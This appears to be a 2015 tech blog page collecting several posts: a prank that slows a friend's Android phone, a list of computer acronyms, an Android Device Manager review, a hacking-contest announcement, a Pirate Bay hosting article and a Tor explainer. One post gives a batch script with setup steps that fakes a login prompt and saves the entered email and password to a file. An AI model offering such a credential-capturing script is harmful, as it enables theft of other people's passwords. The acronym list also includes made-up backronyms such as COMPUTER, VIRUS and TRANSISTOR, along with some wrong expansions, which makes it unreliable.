india

india

Wednesday, 21 October 2015

Prank Your Friends With This Android Feature

Every one hates when their smartphone works very slow. In this tutorial we will teach you how to make an android smartphone performance very slow.
Follow the few simple steps given below to make an android smartphone performance slow.
Step 1: Go to settings and find “About phone” at very bottom of the list on Android phone.
about phone
Step 2: Inside About phone you can see “Build number” now keep on tapping “Build number” option until you get “Developer options”.
Step 3: Once you are inside developer options search for “Windows animation scale”“Transition animation scale,” and “Animator duration scale.”
animation scale
Step 4: Tap on each option and set the animation scale to 10x. Now you will feel your android smartphone performance very slow than before.
1x to 10x
Note : By putting your Animation scale from 1x to 10x makes your android phone smart very slow, by clicking on Animation scale 1x it will bring your mobile to normal mode.

Full form of Computer Terms

  • ALU: Arithmetic logic unit
  • ACPI: Advanced Configuration and Power Interface
  • AC: Alternating Current
  • AM: Amplitude Modulated
  • AMD: Advanced Micro Devices, Inc.
  • AMD: Advanced Micro Devices, Inc.
  • AMI: American Megatrends Inc.
  • ANSI: American National Standards Institute
  • API: Application Program Interface
  • APIC: Advanced Programmable Interrupt Controller
  • APM: Advanced Power Management
  • ASCII: American Standard Code for Information Interchange
  • ASIC: Application Specific Integrated Circuit
  • ASPI: Advanced SCSI Programming InterfaceAT: Advanced Technology
  • ATA: AT Bus Attachment
  • ATAPI: ATA Packet Interface
  • ATM: Asynchronous Transfer Mode
  • BBS: Bulletin Board System
  • BCC: Block Check Character
  • BSC: Binary Synchronous Communications
  • BSD: Berkeley Standard Distribution
  • BTU: British Thermal Units
  • BCD: Binary Coded Decimal
  • BIOS: Basic Input / Output System
  • BNC: Bayonet Nut Connector
  • BPS: Bytes Per Second
  • bps: bits Per Second
  • CAM: Computer Aided Manufacturing
  • CAD: Computer Aided Design
  • CAS: Column Address Strobe
  • CPU : Central Processing Unit
  • CPI: Clocks Per Instruction
  • CR: Carriage Return
  • CUI : Composite User Interface
  • CRT : Cathode Ray Tube
  • CRC: Cyclical Redundancy Check
  • CD: Carrier Detect & Compact Disc
  • CD-R : Compact Disc-Recordable
  • CD-RW : Compact Disc-ReWritable
  • CD-ROM : Compact disc read-only memory
  • CGA: Color Graphics Adapter
  • CHS: Cylinder Head Sector
  • COMPUTER: Common Oriented Machine Particularly Used for Trade Education and Research
  • CMOS: Complementary Metal-Oxide Semiconductor
  • CPLD: Complex Programmable Logic Device
  • CSR: Command Status Register
  • CRC: Cyclic Redundancy Check
  • CTS: Clear To Send
  • DVI : Digital Visual Interface
  • DVD : Digital Video Disc or Digital Versatile Disc
  • DAT: Digital Audio Tape
  • DC: Direct Current
  • DCD: Data Carrier Detect
  • DCE: Data Circuit-terminating Equipment
  • DD: Double Density
  • DEC: Digital Equipment Corporation
  • DIMM: Dual Inline Memory Module
  • DIP: Dual-In-line Package
  • DMA: Direct Memory Access
  • DMI: Desktop Management Interface
  • DOS: Disk Operating System
  • DPE: Data Parity Error
  • DRAM: Dynamic Random Access Memory
  • DS: Double Sided
  • DSP: Digital Signal Processor
  • DSR: Data Set Ready
  • DTA: Disk Transfer Area
  • DTC: Data Terminal Controller
  • DTE: Data Terminating Equipment
  • DTR: Data Terminal Ready
  • EBCDIC: Extended Binary Coded Decimal Interchange Code
  • EC: Error Check
  • ECC: Error Check and Correction
  • ECP: Enhanced Communication Port
  • ECU: EISA Configuration Utility
  • EDO: Extended Data Out RAM
  • EEPROM: Electrically Erasable Programmable Read Only Memory
  • EGA: Enhanced Graphics Adapter
  • EIA: Electronic Industries Association
  • EIDE: Enhanced Integrated Device Electronics
  • EISA: Enhanced Industry Standard Architecture
  • EMI: Electro-Magnetic Interference
  • EMF: Electro-Magnetic Force
  • EMM: Expanded Memory Manager
  • EMS: Expanded Memory Specification
  • EOF: End Of File
  • EOL: End Of Line
  • EPP: Enhanced Parallel Port
  • EPROM: Erasable Programmable Read Only Memory
  • ESCD: Extended System Configuration Data
  • ESD: Electro-Static Discharge
  • ESDI: Enhanced Small Devices Interface
  • FTP – File Transfer Protocol
  • FAT: File Allocation Table
  • FCC: Federal Communications Commission
  • FDD: Fixed/Floppy Disk Drive
  • FDDI: Fiber Distributed Data Interface
  • FDM: Frequency Division Multiplexing
  • FDX: Full-Duplex Transmission
  • FE: Front End
  • FEP: Front End Processor
  • FF: Form Feed
  • FIFO: First-In First-Out
  • FILO: First-In Last-Out
  • FM: Frequency Modulation
  • FPGA: Field Programmable Gate Array
  • FPM: Fast Page Mode RAM
  • FPU: Floating Point Unit
  • FRC: Functional Redundancy Checking
  • FRU: Field-Replaceable Unit
  • FSF: Free Software Foundation
  • FSK: Frequency Shifty Keying
  • GUI : Graphical user interface
  • GAS: Gallium Arsenide
  • GFLOPS: Billions of Floating Point Operations Per Second
  • HTML : Hyper Text Markup Language
  • HD: High Density
  • HDD: Hard Disk Drive
  • HDX: Half-Duplex Transmission
  • HFS: Hierarchical File System
  • HPFS: High Performance File System
  • IBM : International Business Machines
  • I/O: Input/Output
  • IC: Integrated Circuit
  • IDE: Integrated Device Electronics
  • IEEE: Institute of Electrical and Electronic Engineers
  • IMP: Interface Message Processor
  • IP: Internet Protocol
  • IPC: Inter Process Communication
  • IPX: Inter network Packet eXchange
  • IRQ: Interrupt ReQuest
  • ISA: Industry Standard Architecture
  • ISDN: Integrated Services Digital Network
  • ISO: International Standards Organization
  • ISR: Interrupt Service Routine
  • IVT: Interrupt Vector Table
  • JFS: Journalized File System
  • KNI: Katmai New Instructions
  • KVA: KiloVolt-Amps
  • LBA: Linear Block Array / Addressing
  • LCD : Liquid crystal display
  • LAN : Local area network
  • LOGO : Language of Graphic-Oriented
  • LED: Light Emitting Diode
  • LF: Line Feed
  • LIF : Low Insertion Force
  • LIM: Lotus/Intel/Microsoft’s Expanded Memory Manager
  • LRU: Least-Recently Used
  • LSB: Least Significant Byte/bit
  • LSI: Large Scale Integration
  • LUN: Logical Unit Number
  • LASER : Light Amplification by Stimulated Emission of Radiation
  • MAN : Metropolitan area network
  • MESI: Modified/Exclusive/Shared/Invalid
  • MIPS : Microprocessor without Interlocked Pipeline Stages
  • MSo : Micro Soft Office, Multi system operator
  • MB/Mb: Mega Bytes/bits
  • MBR: Master Boot Record
  • MCA: Micro Channel Architecture
  • MCGA: Multi-Color Graphics Array
  • MCM: Multi-Chip Module
  • MDRAM: Multi-bank RAM
  • MFLOPS: Millions of FLOating Point Operations per Second
  • MFM: Modified Frequency Modulated
  • MHz: MegaHertz
  • MICR: Magnetic Ink Character Recognition
  • MIDI: Musical Instrument Data Interface
  • MIMD: Multiple-Instruction Multiple-Data
  • MISD: Multiple-Instruction Single Data
  • MMX: Multi-Media Extensions
  • MNP: Microcom Network Protocol
  • MODEM: MOdulator / DEModulator
  • MOPS: Millions of Operations Per Second
  • MOS: Metal-Oxide Semiconductor
  • MP: Multi-Processor
  • MPP: Massively Parallel Processor
  • MPS: Multi-Processor System
  • MSB: Most Significant Byte/bit
  • MSDOS: Microsoft’s Disk Operating System
  • SI: Medium Scale Integration
  • MTBF: Mean Time Between Failure
  • N/C: No-Connect
  • NBS: National Bureau of Standards
  • NEMA: National Electrical Manufacturers Association
  • NFS: Network File System
  • NFU: Not-Frequently Used
  • NIC: Network Interface Card
  • NMI: Non-Maskable Interrupt
  • NMOS: Negatively doped Metal-Oxide Semiconductor
  • NOP: No OPeration NRU Not-Recently Used
  • NOS: Network Operating System
  • NSF: National Science Foundation
  • NTFS: New Technology File System
  • NVRAM: NonVolatile Random Access Memory
  • OCR: Optical Character Recognition
  • ODI: Open Data link Interface
  • OEM: Original Equipment Manufacturer
  • OS: Operating System
  • OSF: Open Software Foundation
  • OSI: Open Systems Interconnect
  • PAL: Programmable Array Logic
  • PB: Push Button
  • PBX: Private Branch eXtender
  • PC: Personal Computer, Program Counter
  • PCB: Printed Circuit Board
  • PCI: Peripheral Component Interconnect
  • PCM: Pulse Code Modulation
  • PCMCIA: Personal Computer Memory Card International Association
  • PE: Processor Element
  • PFF: Page Fault Frequency
  • PGA: Professional Graphics Array
  • PGA: Pin Grid Array
  • PIC: Programmable Interrupt Controller
  • PIO: Programmed Input / Output
  • PIROM: Processor Information ROM
  • PLA: Programmable Logic Array
  • PLCC: Plastic Leaded Chip Carrier
  • PLD: Programmable Logic Devices
  • PLL: Phase Locked Loop
  • PM: Preventive Maintenance
  • PMOS: Positively doped Metal-Oxide Semiconductor
  • PnP: Plug-and-Play
  • POST: Power On Self Test
  • PPP: Point-to-Point Protocol
  • PQFP: Plastic Quad Flat Pack
  • PROM: Programmable Read Only Memory
  • PSTN: Public Switched Telephone Network
  • PSP: Program Segment Prefix
  • PTE: Page Table Entry
  • QAM: Quadrature Amplitude Modulation
  • QFP: Quad Flat Pack
  • QIC: Quarter Inch Cartridge
  • RAM – Random-access memory
  • RAID: Redundant Arrays of Inexpensive Disks
  • RAMDAC: Random Access Memory Digital to Analogue Converter
  • RAS: Row Address Strobe
  • RCA: Radio Corporation of America
  • RCC: Routing Control Center
  • RDRAM: Rambus DRAM
  • RFC: Request For Comments
  • RFI: Radio Frequency Interference
  • RI: Ring Indicator
  • RISC: Reduced Instruction-Set Computer
  • RLL: Run Length Limited
  • RMS: Root Mean Squared
  • RMW: Read Modify Write
  • ROM: Read Only Memory
  • RPC: Remote Procedure Call
  • RPM: Rotations Per Minute
  • RTC: Real Time Clock
  • RTS: Request To Send
  • SAM: Sequential Access Memory
  • SASI: Shugart Associates Standard Interface
  • SCSI: Small Computer Systems Interface
  • SD: Single Density
  • SDLC: Synchronous Data Link Control
  • SDRAM: Synchronous Dynamic RAM
  • SDRAM DDR: Double Data Rate SDRAM
  • SDRAM BDDR: Bi-Directional Strobed DDR SDRAM
  • SE: Systems Engineer
  • SEC: Single Edge Contact
  • SFF: Small Form Factor
  • SGRAM: Synchronous Graphics RAM
  • SMS : Short Message Service
  • SIMD: Single-Instruction Multiple-Data
  • SIMM: Single Inline Memory Module
  • SIPP: Single Inline Pinned Package
  • SISD: Single-Instruction Single-Data
  • SLIP: Serial Line Internet Protocol
  • SMD: Surface Mount Device
  • SMT: Surface Mount Technology
  • SNA: System Network Architecture
  • SNR: Signal to Noise Ratio
  • SOL: Small Out Line
  • SOIC: Small Outline Integrated Circuit
  • SPOOL: Simultaneous Peripheral Operation On Line
  • SPT: Sectors Per Track
  • SPU: Single Processor Unit
  • SRAM: Static Random Access Memory
  • SS: Single Sided
  • STDM: Synchronous Time Division Multiplexing
  • STN: Super Twisted Nematic
  • STU: Streaming Tape Unit
  • SVGA: Super Video Graphics Array
  • TCM: Trellis Code Modulation
  • TCP : Transmission Control Protocol
  • TCP/IP: Transmission Control Protocol / Internet Protocol
  • TDM: Time Division Multiplexing
  • TI: Texas Instruments
  • TIA: Telecomm Industry Association
  • TLB: Translation-Look aside Buffer
  • TPI: Tracks Per Inch
  • TRANSISTOR: TRANSformer resISTOR
  • TSR: Terminate and Stay Resident
  • TTL: Transistor-Transistor Logic
  • UAE: Unrecoverable Application Error
  • UART: Universal Asynchronous Receiver/Transmitter
  • USART: Universal Synchronous/Asynchronous Receiver/Transmitter
  • UDP: User Datagram Protocol
  • UMB: Upper Memory Block
  • USB: Universal Serial Bus
  • UNIX: A trademark used for a computer disk operating system
  • UPS – Uninterruptible power supply
  • USL: UNIX System Labs
  • UUCP: UNIX to UNIX Copy Program
  • VIRUS : Vital Information Resources Under Seize
  • VDU : Visual Display Unit
  • VBE: Video BIOS Extensions
  • VCR: Video Cassette Recorder
  • VESA: Video Enhanced Standards Association
  • VGA: Video Graphics Array
  • VLB: VESA Local Bus
  • VLIW: Very Long Instruction Word
  • VLSI: Very Large Scale Integration
  • VM: Virtual Memory
  • VME: Versa Module Euro-car
  • VRAM: Video Random Access Memory
  • VRT: Voltage Reduction Technology
  • VTR: Video Tape Recorder
  • WAN : Wide area network
  • WATS: Wide Area Telephone Service
  • WD: Western Digital
  • WORM: Write Once – Read-Many
  • WRAM: Window Random Access Memory
  • WS: Wait State
  • WWW : World Wide Web
  • XGA: eXtended Graphics Array
  • XMS: Extended Memory Specification
  • XOR: Exclusive-OR
  • XNOR: Exclusive-NOR
  • XT: eXtended Technology
  • ZIF: Zero Insertion Force
  • How to Locate Your Lost Android Device Easily

    Lost you android phone ..? Feeling to sad .. :(   Dont worry  Now we came with another Application which sorts out your problem in simple way. Recently Google had come up with an Application called Android Device Manager.

    What is Android Device Manager?

    This App is developed by Google for their Android Devices, this App has a Security technique which allows users to locate their devices on Google Map. The app also allows its users to remotely erase all the data on the Smartphone or Tablet. Also it provides a functionality of remotely locking the Android Smartphone The Google Android Device Manager application is available for all the users to download on Google Play Store. The application comes in 1.0.2 version which can be easily installed on Android 2.3 or later versions.

    Android Device Manager features:-

    • Android Device Manager features that includes locating an android tablet or smartphone on a map,
    • Resetting its locking code, and completely erasing it.
    • Missing device should connected to mobile network or to Wi-Fi for it to execute the commands.
    • Strong Points with Android Device Manager.
    • Free App available in Play Store.

    App do’s:

    Location tracking: Most common feature which comes with other tools too but acts as primary pros for this app. The Location tracking features requires no other additional setup is the feature on the cap for this app.
    Remote wipe: The best part of this tool is remotely cleaning the files on your phone which you think can be sensitive if used by the thief.
    Remote alarm: One can make use of this application for generating alarms remotely for their lost Smartphones or Tablets.
    Remote lock: Android Device Manager comes with fantastic feature of Remote Locking the Android Smartphone or Tablet.
    Easy: The User Interface of the application is very good and makes it easy to use.

    App don’t do:

    Spy Camera: The application is not able to give a spy camera feature which could have been an addition on if given in case of finding the lost Phone.
    Messaging: Android Device Manager App provides no facility of messaging that is common in most of the similar plot applications. Such a missing feature becomes a drawback for this app.
    They are more Apps available in Play Store like Kaspersky Mobile Security, Avast Mobile Security and many more which provides more advance features than this like send messages to the lost device, and also receive images from the Android Smartphone or Tablet. I wish Google should put more advance features like this in it’s coming updates to Android Devices. It should also have pre-installed App like Find My Phone which is available for iPhone now.
    The other way you can recover your android mobile is by typing “lost my mobile” in google.

    How to create a keylogger in notepad



    Here is a basic keylogger script for beginners to understand the basics of how keylogging works in notepad. This script should be used for research purposes only.
    @echo off color a title Login cls echo Please Enter Email Adresss And Password echo. echo. cd "C:\Logs" set /p user=Username: set /p pass=Password: echo Username="%user%" Password="%pass%" >> Log.txt start >>Program Here<< exit
    Step 1: Now paste the above code into Notepad and save it as a Logger.bat file.
    Step 2: Make a new folder on the desktop and name it Logs (If the folder is not called Logs, then it will not work.)
    Step 3: Drag that folder in to the C:\
    Step 4: Test out the Logger.bat!
    Step 5: Alright, now once you test it, you will go back into the Logs folder in the C:\ and a .txt file will be in there, [if you make a second entry, the .txt file will overwrite itself.]

    Worldwide Hacking Competition For Students

    The NYU Polytechnic School of Engineering has announced the largest hacking competition for students.This is especially for US students and they have chance to win cybersecurity-based scholarships and prizes.Announced perviously, the US college is now allowing students from high school to register for this largest hacking competition.
    Last year over fifteen thousand students participated and many qualified the preliminary rounds in order to reach the finals in six separate competitions.
    This year is the 11th Cyber Security Awareness Week event.This year there are special prizes for students who qualify in preliminary hacking rounds, they get chance to travel to Brooklyn, NYC to compete for scholarships and prizes.
    November 13-15 the finals will take place
    Yahoo’s chief information security officer Alex Stamos will be in attendance, and will deliver the keynote address during the Finalist Reception on November 13. Stamos’s talk, “Shaping the Future: Spies, Cyber Crimes, and Your Career,” will explore historical and ethical debates within the field, as well as discuss his own experiences in protecting the data of Yahoo users.
    Stamos commented:
    “A career in information security has never held so much promise or peril. New members of the security community have the opportunity to build systems that bring trust and innovation into the lives of billions.”
    Twenty institutions ready to sponser the security week inculding the US Department of Homeland Security, Yahoo, Facebook, the National Security Agency (NSA), Microsoft and the MIT Lincoln Laboratory.
    The NYU School of Engineering was one of the first universities to offer cybersecurity programs for students in the United States. It also launched a master’s degree in the subject in 2009. 

    How The Pirate Bay Remains Untouchable

    The Pirate Bay Remains Untouchable
    The Pirate Bay Remains Untouchable
    The Pirate Bay still remains the world’s largest torrent site which handles requests from millions of users every single day and is in the top 100 most visited websites on the Internet. Generally, The Pirate Bay is famous for potentially hosting copyright material on its website.
    Despite years of harrassment from the law, it remains to violate copyright laws worldwide. Even both the founders of The Pirate Bay (TPB) file exchange service were arrested by the authorities and are in prison, but their notorious pirated content exchange continues to receive millions of unique visitors daily.
    But how can they still be serving content whilst in prison?. Recently, The Pirate Bay team has revealed how cloud technology made its service’s virtual servers truly secure to avoid police raids and detection.
    The Pirate Bay is running on “virtual machines” through a few commercial cloud hosting services, even without knowing that who they are dealing with. According to TorrentFreak report, at present The Pirate Bay has 21 virtual machines (VMs) that are hosted around the globe at different cloud providers.
    The cloud technology eliminates the use of any crucial pieces of hardware, ultimately making the site more portable, and therefore made the torrent harder to take down.
    The Pirate Bay operates using 182 GB of RAM and 94 GPU cores, with total storage capacity of 620 GB, which actually are not used in full.
    Out of 21 VMs, eight of the VMs are used to serve web pages, six are dedicated to handling searches, while two VMs currently runs the site’s database and the remaining five virtual machines are used for load balancing, statistics, the proxy site on port 80, torrent storage and for the controller.
    Interestingly, the commercial cloud hosting providers have no idea that The Pirate Bay is using their services, because all traffic goes through the load balancer, which masks the activities of other virtual machines from the cloud providers. This clearly means that none of the IP-addresses of the cloud hosting providers are publicly linked to The Pirate Bay, therefore keeping them safe.
    While, in case of closure of some of these cloud servers by the police, it is always possible to move VMs to another location in a relatively short duration of time. Just like when back in 2006 in Sweden, police raided The Pirate Bay’s hosting company, seizing everything from blank CDs to fax machines and servers, taking down the site. But, it took just three days to return in its normal state.

    What Is Tor ? And Should I Need To Use It ?

    What is Tor ?
    Tor is a free software program that you load onto your computer (like a browser) that hides your IP address every time you send or request data on the Internet. The process is layered with heavy-duty encryption, which means your data is layered with privacy protection.
    Then there’s the route your data takes as it travels to its destination: Tor will bounce your Internet requests and data through a vast and extensive network of relays (servers) around the world. That data path is never the same, because Tor uses up to 5,000 Tor relays to send your data request. Think of it as a huge network of “hidden” servers that will keep your online identity (meaning your IP address) and your location invisible.
    Tor has extreme value because it can work with your website browser, remote log-in applications and even with instant-messaging software. Tor is registered as a nonprofit company, so they run mainly on donations and reliance on the hope that people will become a relay to their network.
    Uses of Tor
    By using Tor, websites will no longer be able to track the physical location of your IP address or what you have been looking at online…and neither will any interested organizations that may want to monitor someone’s Internet activity—meaning law enforcement or government security agencies. Tor is like a proxy on steroids.
    How it Works ?

    main-qimg-fefaf08e9c40d57c87f2d8229ece6be9
    main-qimg-419dfa91f8cae46b2e63ea4977718257
    main-qimg-5e27f1b703e513a4bb433e84fcfab8dc
    Here is a video link of Tor :- How Tor Works – A ComputeCycle Deep Dive

    Were I can get Tor
    Download Link :- Torproject.org
    Supports :- Windows 8, 7, Vista, and XP
    Does Tor makes our browsing slow ? 
    Tor is slower than a regular Internet connection. However, the Tor developers have been doing a lot of hard work to make the Tor network faster. And it is faster today than ever before. One of the best things that can be done to speed up the Tor network is to create more relays. If you would like to contribute to making the Tor network faster, you can check out our Tor Challenge
    Is Tor secure?
    Security and anonymity go hand in hand on the Internet. As an online anonymizer, Tor was designed to be secure.
    However, documents leaked by former National Security Agency (NSA) contractor Edward Snowden show that the NSA has tried to crack, infiltrate or weaken any encryption that the agency does not itself control.
    In light of this news, nearly all independent encryption and online communication services have become suspect, including Tor.
     How To Install Tor?
    Here is the installation link :- Tor browser